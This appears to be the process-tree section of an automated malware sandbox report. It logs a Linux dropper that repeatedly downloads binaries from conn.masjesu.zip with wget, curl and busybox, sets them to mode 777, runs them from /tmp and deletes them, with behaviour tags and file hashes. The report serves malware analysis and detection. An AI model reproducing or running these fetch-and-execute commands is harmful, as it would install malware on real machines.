/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵PID:953
-
-
/bin/chmodchmod 777 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf1./7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm 7rd3LIcaLBfI5TceugAFbNIlbZMhwi5yf12⤵PID:956
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:957
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- System Network Configuration Discovery
PID:960
-
-
/bin/chmodchmod 777 MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA./MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm MWXLJq2aJGYxfQbk5RXKIhcWudF5qJwtgA2⤵PID:963
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- System Network Configuration Discovery
PID:964
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:967
-
-
/bin/chmodchmod 777 Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To./Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm Pi0hFVjPk145fftaTOg6VgmWn3GoDpZ2To2⤵PID:970
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:971
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/chmodchmod 777 aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/aihC944K8Q0TvCpjxSMtRX5smAOk3is675./aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm aihC944K8Q0TvCpjxSMtRX5smAOk3is6752⤵PID:977
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵PID:978
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/chmodchmod 777 zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt./zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm zjmCZFxms1TtoYpgq2wRKTEo09ArgwH6rt2⤵PID:984
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- System Network Configuration Discovery
PID:985
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- System Network Configuration Discovery
PID:988
-
-
/bin/chmodchmod 777 WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/WbPyBOByRmIjujsGoHNEThpAKTMlChnflT./WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm WbPyBOByRmIjujsGoHNEThpAKTMlChnflT2⤵PID:991
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- System Network Configuration Discovery
PID:992
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:993
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- System Network Configuration Discovery
PID:995
-
-
/bin/chmodchmod 777 pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW./pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm pUQVTrfgKNmwTkoLdT2eOryg4o4Ue7GSWW2⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr./mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm mH8mvvw5pduExIqh9BHtUXVCVcl0z6Mfhr2⤵PID:1005
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:1006
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:1009
-
-
/bin/chmodchmod 777 clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- File and Directory Permissions Modification
PID:1010
-
-
/tmp/clzUaHSZuJeDjsSF3MAw89fET819sW9JZ0./clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵
- Executes dropped EXE
PID:1011
-
-
/bin/rmrm clzUaHSZuJeDjsSF3MAw89fET819sW9JZ02⤵PID:1012
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97